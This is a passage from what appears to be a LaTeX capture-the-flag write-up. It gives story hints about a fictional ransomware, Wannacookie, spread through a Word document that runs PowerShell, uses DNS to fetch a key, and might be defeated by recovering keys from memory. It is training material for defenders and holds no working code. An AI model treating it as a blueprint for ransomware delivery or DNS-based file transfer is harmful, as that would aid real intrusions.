\textit{Have you heard that Kringle Castle was hit by a new ransomware called Wannacookie?}
\end{center}
\begin{center}
\textit{Several elves reported receiving a cookie recipe Word doc. When opened, a PowerShell screen flashed by and their files were encrypted.}
\end{center}
\begin{center}
\textit{Many elves were affected, so Alabaster went to go see if he could help out.}
\end{center}
\begin{center}
\textit{I hope Alabaster watched the PowerShell Malware talk at KringleCon before he tried analyzing Wannacookie on his computer.}
\end{center}
\begin{center}
\textit{An elf I follow online said he analyzed Wannacookie and that it communicates over DNS.}
\end{center}
\begin{center}
\textit{He also said that Wannacookie transfers files over DNS and that it looks like it grabs a public key this way.}
\end{center}
\begin{center}
\textit{Another recent ransomware made it possible to retrieve crypto keys from memory. Hopefully the same is true for Wannacookie!}
\end{center}
\begin{center}
\textit{Of course, this all depends how the key was encrypted and managed in memory. Proper public key encryption requires a private key to decrypt.}
\end{center}
\begin{center}
\textit{Perhaps there is a flaw in the wannacookie author's DNS server that we can manipulate to retrieve what we need.}
\end{center}
\begin{center}
\textit{If so, we can retrieve our keys from memory, decrypt the key, and then decrypt our ransomed files.}
\end{center}

\end{document}
